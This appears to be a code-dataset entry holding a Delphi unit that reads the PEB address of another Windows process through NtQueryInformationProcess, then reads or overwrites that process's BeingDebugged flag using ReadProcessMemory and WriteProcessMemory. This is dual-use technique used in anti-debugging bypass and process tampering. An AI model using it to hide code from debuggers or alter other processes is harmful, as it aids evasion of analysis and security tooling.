            "plain_code": "unit UntPEBDebug;\r\n\r\ninterface\r\n\r\nuses Windows;\r\n\r\nconst PROCESS_QUERY_LIMITED_INFORMATION = $1000;\r\n        PROCESS_BASIC_INFORMATION         = 0;\r\n\r\n// https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess\r\nvar _NtQueryInformationProcess : function(\r\n                                            ProcessHandle : THandle;\r\n                                            ProcessInformationClass : DWORD;\r\n                                            ProcessInformation : Pointer;\r\n                                            ProcessInformationLength :\r\n                                            ULONG; ReturnLength : PULONG) : LongInt; stdcall;\r\n\r\n    hNTDLL : THandle;\r\n\r\n\r\n{$IFDEF WIN64}\r\ntype\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : Int64;\r\n    PebBaseAddress     : Pointer;\r\n    AffinityMask       : Int64;\r\n    BasePriority       : Int64;\r\n    UniqueProcessId    : Int64;\r\n    InheritedUniquePID : Int64;\r\n    end;\r\n{$ELSE}\r\ntype\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : DWORD;\r\n    PebBaseAddress     : Pointer;\r\n    AffinityMask       : DWORD;\r\n    BasePriority       : DWORD;\r\n    UniqueProcessId    : DWORD;\r\n    InheritedUniquePID : DWORD;\r\n    end;\r\n{$ENDIF}\r\n\r\nfunction GetProcessDebugStatus(AProcessID : Cardinal; var ADebugStatus : boolean) : Boolean;\r\nfunction SetProcessDebugStatus(AProcessID : Cardinal; ADebugStatus : Boolean) : Boolean;\r\n\r\nimplementation\r\n\r\n{-------------------------------------------------------------------------------\r\n    Open a process and retrieve the point of debug flag from PEB.\r\n\r\n    If function succeed, don't forget to call close process 
handle.\r\n-------------------------------------------------------------------------------}\r\nfunction GetDebugFlagPointer(AProcessID : Cardinal; var AProcessHandle : THandle) : Pointer;\r\nvar PBI     : TProcessBasicInformation;\r\n    ARetLen : Cardinal;\r\nbegin\r\n    result := nil;\r\n    ///\r\n\r\n    AProcessHandle := 0;\r\n\r\n    if NOT Assigned(_NtQueryInformationProcess) then\r\n    Exit();\r\n    ///\r\n\r\n    AProcessHandle := OpenProcess(PROCESS_QUERY_INFORMATION or PROCESS_VM_WRITE or PROCESS_VM_READ, false, AProcessID);\r\n    if (AProcessHandle = 0) then\r\n    Exit;\r\n\r\n    if _NtQueryInformationProcess(AProcessHandle, PROCESS_BASIC_INFORMATION, @PBI, sizeOf(TProcessBasicInformation), @ARetLen) = ERROR_SUCCESS then\r\n    result := Pointer(NativeUInt(PBI.PebBaseAddress) + (SizeOf(Byte) * 2))\r\n    else\r\n    CloseHandle(AProcessHandle);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n    Retrieve the target process debug status from PEB.\r\n\r\n    ADebugStatus = True  : Target process debug flag is set.\r\n    ADebugStatus = False : Target process debug flag is not set.\r\n-------------------------------------------------------------------------------}\r\nfunction GetProcessDebugStatus(AProcessID : Cardinal; var ADebugStatus : boolean) : Boolean;\r\nvar hProcess         : THandle;\r\n\r\n    pDebugFlagOffset : Pointer;\r\n    pDebugFlag       : pByte;\r\n    ABytesRead       : SIZE_T;\r\nbegin\r\n    result := false;\r\n    ///\r\n\r\n    pDebugFlagOffset := GetDebugFlagPointer(AProcessID, hProcess);\r\n\r\n    if not Assigned(pDebugFlagOffset) then\r\n    Exit();\r\n    ///\r\n    try\r\n    getMem(pDebugFlag, sizeOf(Byte));\r\n    try\r\n        if NOT ReadProcessMemory(hProcess, pDebugFlagOffset, pDebugFlag, sizeOf(Byte), ABytesRead) then\r\n        Exit;\r\n\r\n        ///\r\n        ADebugStatus := (pDebugFlag^ = 1);\r\n    finally\r\n        FreeMem(pDebugFlag);\r\n    end;\r\n\r\n  
  ///\r\n    result := (ABytesRead = SizeOf(Byte));\r\n    finally\r\n    CloseHandle(hProcess);\r\n    end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n    Update target process debug flag.\r\n\r\n    ADebugStatus = True  : Set target process debug flag.\r\n    ADebugStatus = False : Unset target process debug flag.\r\n-------------------------------------------------------------------------------}\r\nfunction SetProcessDebugStatus(AProcessID : Cardinal; ADebugStatus : Boolean) : Boolean;\r\nvar hProcess         : THandle;\r\n\r\n    pDebugFlagOffset : Pointer;\r\n    ADebugFlag       : Byte;\r\n    ABytesWritten    : SIZE_T;\r\nbegin\r\n    result := false;\r\n    ///\r\n\r\n    pDebugFlagOffset := GetDebugFlagPointer(AProcessID, hProcess);\r\n\r\n    if not Assigned(pDebugFlagOffset) then\r\n    Exit();\r\n    ///\r\n    try\r\n    if ADebugStatus then\r\n        ADebugFlag := 1\r\n    else\r\n        ADebugFlag := 0;\r\n\r\n    if NOT WriteProcessMemory(hProcess, pDebugFlagOffset, @ADebugFlag, SizeOf(Byte), ABytesWritten) then\r\n        Exit;\r\n\r\n    ///\r\n    result := (ABytesWritten = SizeOf(Byte));\r\n    finally\r\n    CloseHandle(hProcess);\r\n    end;\r\nend;\r\n\r\ninitialization\r\n    {\r\n    Load NtQueryInformationProcess from NTDLL.dll\r\n    }\r\n    _NtQueryInformationProcess := nil;\r\n\r\n    hNTDLL := LoadLibrary('ntdll.dll');\r\n\r\n    if (hNTDLL <> 0) then\r\n    @_NtQueryInformationProcess := GetProcAddress(hNTDLL, 'NtQueryInformationProcess');\r\n\r\nfinalization\r\n    _NtQueryInformationProcess := nil;\r\n\r\n    if (hNTDLL <> 0) then\r\n    FreeLibrary(hNTDLL);\r\n\r\n\r\nend."
        }
    ]
}